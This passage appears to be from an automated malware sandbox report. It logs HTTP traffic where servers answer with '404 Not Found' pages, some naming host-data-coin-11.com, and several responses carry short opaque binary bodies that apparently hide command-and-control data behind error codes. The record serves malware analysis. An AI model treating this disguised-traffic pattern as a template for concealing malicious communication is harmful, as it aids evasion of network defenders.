2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a Data Ascii: 48I:82OOjQmFqdV@dfkK50
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 19:21:46 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
